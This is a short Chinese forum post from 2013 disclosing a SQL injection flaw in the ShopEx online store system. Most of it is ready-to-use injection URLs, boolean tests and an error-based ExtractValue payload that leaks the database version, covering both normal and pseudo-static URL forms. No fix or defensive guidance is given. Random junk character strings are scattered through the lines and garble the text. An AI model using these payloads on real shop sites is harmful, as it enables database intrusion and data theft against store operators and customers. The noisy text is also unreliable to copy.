注入漏洞是一种经典的漏洞类型了,自从上次跟基友深聊了注入,我对注入的认识又提升了一个高度,在我看来不可以注入的地方,TMD的竟然可以注入,注入攻击最早出现了1998年,貌似是,记不清了。10多年了,依然存在,虽然比以前出现量少了,但不得不用到的一种攻击技术…
: \, W7 H: S) I1 g% Q# d2 }
9 |: p9 F9 i4 L! y) R0 \好吧,我扯远了~~6 B" P5 @6 S+ r6 O
其实注入不仅仅出现在动态页面上,难道伪静态后就不能注入了吗?NO~8 S; W: U# q5 x: R, E& Z7 A/ u
不扯了,直接说主题吧,shopex网店系统注入漏洞。注入点如下: O6 x; d6 ^" s1 j. \' B
' i" [$ I. X' y
http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html1 n( [0 Z: @1 Z# O
, o/ a/ V' |# v! thttp://www.x.com/comment-8967′/**/and/**/ExtractValue(0×64,concat(0×01,(select/**/@@version)))/**/order/**/by/**/’1-ask-commentlist.html1 H# m" r$ v5 N( d+ m. x
4 V0 M: V; M$ t* j8 i0 Ahttp://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html
7 R+ E; \, q) _/ c) x- \) X6 h
7 v! F+ t/ w; Q( O; N5 y( ?: Zhttp://demo.x.com.cn/485/index.php?comment-190′/**/and/**/’1′=’1-ask-commentlist.html8 z- t# H6 [1 |: S9 a
7 @$ h, r; i' m% ]7 ]: z
' G/ |7 z* t) `8 `4 o( t
一个是网站未开启伪静态的注入,一个是网站开启伪静态后的注入,以及是否屏蔽错误回显的2X2=4种情况。9 W7 u- N: v5 R
如何注入就不多说了,10多年的东西了…不会也会了…$ V* k/ \$ z+ J2 u) G' w
9 ]' t. |2 X) B; Z1 e
|
发表于 2013-2-4 16:20:04
收藏
支持
反对